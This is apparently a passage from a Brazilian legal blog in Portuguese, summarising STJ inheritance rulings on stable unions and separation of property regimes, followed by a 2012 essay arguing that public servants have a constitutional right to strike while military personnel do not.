No caso analisado, a herança do falecido era composta de proventos e diferenças salariais, resultado do seu trabalho no Ministério Público, não recebido em vida. Após ser habilitado como único herdeiro necessário, o filho pediu em juízo o levantamento dos valores deixados pelo pai.

O magistrado indeferiu o pedido, fundamentando que a condição de único herdeiro necessário não estava comprovada, visto que havia ação declaratória de união estável pendente. O tribunal estadual entendeu que, se fosse provada e reconhecida a união estável, a companheira teria direito a 50% do valor da herança.

Distinção

O ministro Salomão explicou que o artigo 1.659, inciso VI, do CC, segundo o qual, os proventos do trabalho pessoal de cada cônjuge ficam excluídos da comunhão, refere-se ao regime de comunhão parcial de bens.

Ele disse que o dispositivo não pode ser interpretado de forma conjunta com o disposto no artigo 1.790, inciso II, do CC/02, que dispõe a respeito da disciplina dos direitos sucessórios na união estável.

Após estabelecer a distinção dos dispositivos, ele afirmou que o caso específico correspondia ao direito sucessório. Por essa razão, a regra do artigo 1.659, inciso VI, estaria afastada, cabendo à companheira um terço do valor da herança.

Separação de bens

Um casal firmou pacto antenupcial em 1950, no qual declararam que seu casamento seria regido pela completa separação de bens. Dessa forma, todos os bens, presentes e futuros, seriam incomunicáveis, bem como os seus rendimentos, podendo cada cônjuge livremente dispor deles, sem intervenção do outro.

Em 2001, passados mais de 50 anos de relacionamento, o esposo decidiu elaborar testamento, para deixar todos os seus bens para um sobrinho, firmando, entretanto, cláusula de usufruto vitalício em favor da esposa.

O autor da herança faleceu em maio de 2004, quando foi aberta sua sucessão, com apresentação do testamento. Quase quatro meses depois, sua esposa faleceu, abrindo-se também a sucessão, na qual estavam habilitados 11 sobrinhos, filhos de seus irmãos já falecidos.

Nova legislação

O Tribunal de Justiça do Rio de Janeiro reformou a sentença de primeiro grau para habilitar o espólio da mulher no inventário dos bens do esposo, sob o fundamento de que, como as mortes ocorreram na vigência do novo Código Civil, prevaleceria o novo entendimento, segundo o qual o cônjuge sobrevivente é equiparado a herdeiro necessário, fazendo jus à meação, independentemente do regime de bens.

No REsp 1.111.095, o espólio do falecido sustentou que, no regime da separação convencional de bens, o cônjuge sobrevivente jamais poderá ser considerado herdeiro necessário. Alegou que a manifestação de vontade do testador, feita de acordo com a legislação vigente à época, não poderia ser alterada pela nova legislação.

O ministro Fernando Gonçalves (hoje aposentado) explicou que, baseado em interpretação literal da norma do artigo 1.829 do CC/02, a esposa seria herdeira necessária, em respeito ao regime de separação convencional de bens.

Entretanto, segundo o ministro, essa interpretação da regra transforma a sucessão em uma espécie de proteção previdenciária, visto que concede liberdade de autodeterminação em vida, mas retira essa liberdade com o advento da morte.

Para ele, o termo “separação obrigatória” abrange também os casos em que os cônjuges estipulam a separação absoluta de seus patrimônios, interpretação que não conflita com a intenção do legislador de corrigir eventuais injustiças e, ao mesmo tempo, respeita o direito de autodeterminação concedido aos cônjuges quanto ao seu patrimônio.

Diante disso, a Quarta Turma deu provimento ao recurso, para indeferir o pedido de habilitação do espólio da mulher no inventário de bens deixado pelo seu esposo.

Fonte: http://www.stj.jus.br/portal_stj/publicacao/engine.wsp?tmp.area=398&tmp.texto=107528&utm_source=agencia&utm_medium=facebook&utm_campaign=Feed%3A+STJNoticias+%28STJNoticias%29

28/10/2012

Direito de Greve dos Servidores Públicos e Militares

Direito de greve dos militares. 

Em nossa legislação a greve, é considerada como a suspensão coletiva, temporária e pacífica, total ou parcial, de prestação pessoal de serviços ao empregador.

Quanto a sua origem e evolução histórica, para alguns historiadores, sua gênese na França em Paris e no que diz respeito a sua evolução histórica cronologicamente foi considerada um delito, depois passou a ser considerada liberdade, no Estado liberal, e posteriormente um direito, nos regimes democráticos.

A natureza jurídica da greve, enquadra-se inicialmente como liberdade, decorrente de um exercício de uma determinação lícita. Sob o ponto de vista da pessoa, do indivíduo, podemos considerá-la como uma liberdade pública, pois o Estado deve garantir seu exercício. Consiste, por fim, um direito de coerção visando à solução do conflito coletivo.

No que se refere a sua função social, a greve constitui um instrumento de autoproteção, visando a realização da justiça social.

No Brasil, quanto a evolução legislativa do direito de greve, destaca-se sucintamente como principais fatos: em 1890, o Código Penal proibia a greve; as constituições de 1891 e 1934, foram omissas quanto ao direito de greve; a constituição de 1937 considerava a greve como recurso anti-social e nocivo ao trabalho; a constituição de 1946 muda a orientação da norma anterior e reconhece o direito de greve; no período de 1967/1969 é outorgado o direito de greve aos trabalhadores, exceto nos serviços públicos e atividades essenciais, definidas em lei. Por fim, a Carta Magna de 1988, assegura o direito de greve, devendo os trabalhadores decidirem sobre a oportunidade de exercê-lo e sobre os interesses que devam por meio dele defender.

Ao trabalhador regido pela CLT, é assegurado o direito de greve, pois, além de estar amparado pelo estabelecido no art. 9º da CF, o Congresso Nacional aprovou a Lei nº 7.783/89 regulamentando o direito de greve ao setor privado.

Aos militares, por disposição expressa na atual Constituição, são vedadas a sindicalização e à greve. Contudo, freqüentemente temos notícias de greves nas polícias de Minas Gerais, Bahia, e outros Estados. Filiamo-nos, acompanhando a doutrina majoritária, no sentido de que com relação aos militares não há que se cogitar o exercício do direito de greve devido a sua peculiar atuação da manutenção da ordem pública e defesa dos interesses do Estado. Quanto à greve dos militares, entendemos ainda, que a mesma poderá dar ensejo a intervenção federal com fundamento no Inciso III do artigo 34 da Constituição Federal.

Quanto aos servidores públicos, o direito a greve foi estabelecido pelo art. 37, VII, da Constituição Federal de 1988. Todavia, quanto à interpretação deste dispositivo, duas posições podem ser verificadas: a primeira afirma que o exercício do direito de greve pelos servidores públicos depende de lei específica, e enquanto essa lei não for editada, a greve não será permitida no serviço público, sendo este dispositivo de eficácia limitada; já a segunda sustenta que a Constituição autoriza a greve dos servidores públicos, porque aboliu a proibição anterior, sendo este dispositivo de eficácia contida.

O Supremo Tribunal Federal ao julgar Mandado de Injunção, a respeito do tema, adotou a primeira posição mais restritiva, condicionando o direito de greve a superveniência da lei específica. Cabe frisar que no tocante aos efeitos jurídicos da decisão proferida em mandado de injunção o Pretório Excelso adotou a posição não concretista, firmando-se no sentido de atribuir ao mandado de injunção a finalidade única de ensejar o reconhecimento formal da inércia do Poder Público, devendo apenas dar ciência ao poder competente para que edite a norma faltante, ou seja, constitui em mera exortação ao legislador.

Quanto a definição, no que consistiria esta lei específica exigida pela Constituição há dois entendimentos. Um de que lei específica é lei ordinária a ser elaborada por cada ente da federação. Outro de que esta lei específica, trata-se uma lei ordinária federal, aplicável a todas as esferas do governo, possuído alcance geral.

De maneira oposta, o Superior Tribunal de Justiça, proferiu algumas decisões interpretando o inciso VII do art.37, como sendo de eficácia contida, garantindo desde já o exercício de greve pelos servidores.

Somos partidários da possibilidade do exercício do direito de greve pelos servidores públicos. A nosso juízo, não se pode reconhecer a ineficácia absoluta deste preceito relacionado aos servidores públicos civis. As normas constitucionais, em face de inicialidade e supremacia, apresentam os caminhos sobre os quais o Estado deverá percorrer, delimitam o seu campo de atuação e fornecem o fundamento de validade de todo o sistema jurídico.

Desta sorte, entendemos que o legislador quis (e efetivamente estabeleceu) um direito que não pode ser amesquinhado ou simplesmente anulado pela inércia legislativa. Se assim não fosse, estaríamos diante do reconhecimento de uma situação extremamente contraditória: subordinar o preceito constitucional à vontade discricionária do legislador ordinário.

O que concluímos, é que o direito a greve é um direito social estabelecido na Constituição inerente a todos os trabalhadores. Desta forma, data venia, discordamos da posição adotada pelo Pretório Excelso que restringiu o direito à greve dos servidores públicos adotando uma legalidade repressora, pela negativa de reconhecimento do direito de greve.

Necessário seria, para apaziguar definitivamente a questão, que a lei específica prevista pelo art. 37, VII da CF, fosse logo promulgada. Porém, parece-nos que falta vontade política para tal feito.

Por fim, entendemos que o direito à greve não constitui um direito absoluto, pois existem disposições constitucionais que para garantir a segurança e ordem pública, bem como, defender interesses da coletividade impõem limitações ao seu exercício que devem ser observadas.

Por Marcos Ralston de Oliveira Rodeguer